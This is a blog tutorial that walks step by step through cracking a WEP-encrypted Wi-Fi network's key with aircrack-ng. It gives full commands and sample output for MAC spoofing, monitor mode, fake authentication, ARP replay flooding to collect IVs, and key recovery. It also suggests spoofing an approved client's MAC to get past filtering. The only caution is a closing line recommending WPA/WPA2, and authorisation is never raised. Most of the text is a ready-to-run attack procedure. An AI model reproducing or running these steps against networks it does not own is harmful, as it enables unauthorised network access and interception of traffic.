Cracking WEP Encryption With aircrack-ng

This article will walk you through cracking WEP encryption with the aircrack-ng suite. Due to the weaknesses in WEP, this can be done in roughly 5 minutes. For this attack, you’ll need the aircrack-ng suite, available here. You’ll also need a compatible wireless chipset (see their documentation for details). I’ll be running this on Linux with an Atheros chipset.

The first step is to open up a Terminal, and enter iwconfig, this should give you a list of your wireless adapters. I’ll be using wlan0 in the examples, but yours may be different.

wlan0     IEEE 802.11bgn  ESSID:"FLVY3"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: 00:26:62:65:B7:78   
          Bit Rate=54 Mb/s   Tx-Power=17 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:8DE0-85A9-34
          Power Management:on
          Link Quality=55/70  Signal level=-55 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:13   Missed beacon:0

Configure the Wireless Adapter

Now put the device down and change our MAC address (optional, uses the macchanger program) by issuing the following commands:

ifconfig wlan0 down
macchanger --mac AA:BB:CC:DD:EE:FF wlan0

If you get the “ERROR: Can’t change MAC: interface up or not permission: Device or resource busy” error, try repeating the ifconfig wlan0 downagain, and then try macchanger --mac AA:BB:CC:DD:EE:FF wlan0 again. At any point, you can check your MAC address by issuing the commandmacchanger --show wlan0

Now we’ll put the wireless adapter into monitoring mode by issuing the command airmon-ng start wlan0. It may show processes that it thinks may interfere with the airmon-ng program. You can kill these processes or just give it a shot without killing them.

Next, we’ll start the airodump-ng program by issuing the command airodump-ng wlan0 and scan for available access points. You should see something like this:

CH  1  ][ Elapsed: 8 s ][ 2011-12-27  17:02


00:11:22:33:44:55 -62 82 10 0 1 54e. WEP WEP WiFi2

BSSID STATION PWR Rate Lost Packets Probes [More stuff here]

The BSSID shows the MAC address for the access point and the ESSID should show the network name. CH indicates what 802.11 channel the AP is broadcasting on, and the ENC value is the encryption used (WEP, WPA, WPA2). The CIPHER and AUTH columns show what cipher and form of authentication are in place. The MB indicates what 802.11 version (speed) is in place. 802.11b has a value of “11”, 802.11b+ is represented by “22” and 802.11g is anything higher than 22. This AP also has an “e.” after it, which indicates that QoS is enabled (e) and that the short preamble is supported (.). Finally, the #Data column shows the number of packets captured – in the case of WEP, this is the number of unique IVs. The #/s column shows the average packets per second (calculated over a running 10-second interval).

We want to identify an AP that is using WEP encryption, not WPA or WPA2. Once we’ve figured out the BSSID and the channel, we’ll kill the program with Ctrl+C and restart it, filtering the results to that specific AP. We’re also going to capture the data to a file using the -w switch. Below, we use the-c to specifiy the channel and –bssid to specifiy the BSSID of the AP. Also, the filenamehere can be anything you want.

airodump-ng -c 1 -w filenamehere --bssid 00:11:22:33:44:55 wlan0

You should now see the same screen as before, but with only the selected interface. The #Data column may or may not be incrementing, depending on whether or not you’re already connected to the network and other factors. We want the #Data column to be around 10,000, and it would take forever to let’s speed that up.

Faking Authentication & Capturing IV Packets

Open another terminal window. We’re going to fake an authentication to the AP, so that our packets register (and we can record the transactions). Issue the command:

aireplay-ng -1 0 -a (BSSID) -h (Your MAC) -e (ESSID) wlan0.

In this example, I would enter:

aireplay-ng -1 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF -e WiFi2 wlan0

Note: If you don’t know your MAC address, omit the -h and the MAC address. It should use the default address.

If successful, you’ll see an output like this:

17:08:35  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:08:35 Sending Authentication Request (Open System) [ACK] 17:08:35 Authentication successful 17:08:35 Sending Association Request [ACK] 17:08:35 Association successful :-) (AID: 1)

We used the -1 switch to tell aireplay-ng to perform an authentication attack with a delay of 0. Sometimes this doesn’t work for a number of reasons, usually MAC address filtering is enabled (in which case you need to figure out the MAC of an approved computer, and spoof it), or you’re too close or too far away.

Now that we’ve authenticated, we’ll spam the router with ARP packets to boost the #Data value in the first terminal window. Issue the following command:
aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0
If successful, you’ll see output like:

17:09:20  Waiting for beacon frame (BSSID: 00:26:62:65:B7:78) on channel 1
Saving ARP requests in replay_arp-1227-171920.cap
You should also start airodump-ng to capture replies.
Read 1440 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

There should be a slight delay, followed by a bunch of text. Your computer may show this as one line that continually changes or as a line after line:

Read 38023 packets (got 19897 ARP requests and 10309 ACKs), sent 11410 packets..
Read 38174 packets (got 19993 ARP requests and 10358 ACKs), sent 11461 packets..
Read 38313 packets (got 20083 ARP requests and 10404 ACKs), sent 11510 packets..
Read 38455 packets (got 20171 ARP requests and 10451 ACKs), sent 11560 packets..
Read 38609 packets (got 20269 ARP requests and 10501 ACKs), sent 11610 packets..
Read 38748 packets (got 20357 ARP requests and 10546 ACKs), sent 11660 packets..
Read 38889 packets (got 20447 ARP requests and 10592 ACKs), sent 11711 packets..
Read 39033 packets (got 20535 ARP requests and 10640 ACKs), sent 11761 packets..
Read 39174 packets (got 20624 ARP requests and 10686 ACKs), sent 11810 packets..
Read 39326 packets (got 20719 ARP requests and 10735 ACKs), sent 11860 packets..
Read 39481 packets (got 20810 ARP requests and 10782 ACKs), sent 11911 packets..
Read 39635 packets (got 20909 ARP requests and 10832 ACKs), sent 11961 packets..
Read 39776 packets (got 20999 ARP requests and 10879 ACKs), sent 12011 packets..
Read 39919 packets (got 21090 ARP requests and 10926 ACKs), sent 12061 packets..
Read 40071 packets (got 21184 ARP requests and 10975 ACKs), sent 12111 packets..
Read 40212 packets (got 21271 ARP requests and 11020 ACKs), sent 12161 packets..
Read 40355 packets (got 21363 ARP requests and 11067 ACKs), sent 12211 packets..

Cracking the Key — Finally!

Once we’ve acquired enough #Data (these are the captured IVs), we can attempt to crack the key by using aircrack-ng. Open a third terminal, and issue the following command:

aircrack-ng -b 00:11:22:33:44:55 filenamehere-01.cap

Be sure to append “-01.cap” to the filenamehere value you picked (above). The -b value should be the BSSID of the access point.

The aircrack-ng program will read the captured IVs from the filenamehere-01.cap file, and you may see it scan through several screens (below) while it is testing the keys against the known IVs:

Opening test-01.cap
Reading packets, please wait...

                        Aircrack-ng 1.1 r1904

             [00:00:01] Tested 362881 keys (got 13078 IVs)

KB depth byte(vote) 0 1/ 5 56(17408) 84(16896) DF(16896) F5(16896) 2D(16640) 1 0/ 2 B8(18688) A6(17664) AC(17408) 96(17152) F7(17152) 2 1/ 2 5A(18176) AC(17664) 32(16896) C8(16896) CF(16896) 3 0/ 1 67(19712) 03(18176) 81(17920) 53(17408) 9B(17408) 4 2/ 3 61(18176) 3B(17408) 4A(17408) 70(17408) 5F(17152) 5 7/ 8 B4(16640) 17(16384) B8(16384) CE(16384) EA(16384) 6 2/ 3 A5(17920) BE(17408) AD(17152) 36(16896) 2C(16640) 7 0/ 1 01(19968) F7(17408) 17(17152) 43(17152) C8(17152) 8 2/ 3 80(17664) 68(17152) 0F(16896) 5D(16896) E7(16896) 9 2/ 3 D3(17664) 72(16896) 1E(16640) AF(16640) D2(16640) 10 6/ 7 1C(16896) 39(16640) 6D(16640) 08(16384) 3D(16384) 11 1/ 2 42(18176) 12(17920) 3F(17664) 95(17152) FE(16896) 12 3/ 4 18(17408) F9(16896) D5(16640) E5(16640) 11(16384)

If you were successful, you should finally see a screen that looks like this:

            Aircrack-ng 1.1 r1904

             [00:00:15] Tested 535861 keys (got 13078 IVs)

KB depth byte(vote) 0 52/ 54 CA(14592) 2F(14336) 34(14336) 78(14336) 83(14336) 1 10/ 1 BB(16128) 1F(15872) 7C(15872) 8C(15872) 19(15616) 2 12/ 26 67(16384) 15(16128) 6F(16128) AA(16128) 5E(15872) 3 4/ 12 9B(17408) CF(16896) D5(16896) 16(16384) 1A(16384) 4 16/ 4 FF(16128) 77(15872) D5(15872) DD(15872) 27(15616)

                     KEY FOUND! [ XX:YY:ZZ:AA:BB ] 
Decrypted correctly: 100%

That’s it! In a matter of 15 seconds, this program was able to completely decrypt the wireless password for the access point. Moral of the story: If you don’t want people getting in to your network, use WPA (or better yet, WPA2) encryption.

Cleaning Up

Before you connect to the internet again, you’ll need to issue airmon-ng stop wlan0 to release your adapter. Also, if you’re connecting via the command line, you can enter the key (without the colons) normally, or (if it’s a passphrase), remember to use the s: before entering the passphrase. Bear in mind, though, that aircrack-ng will give you the key in HEX. If you use the WEP passphrase mode for your key, it may not match up with what you’re familiar with, but give it a shot in HEX mode.

Cracking WEP Encryption With aircrack-ng

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.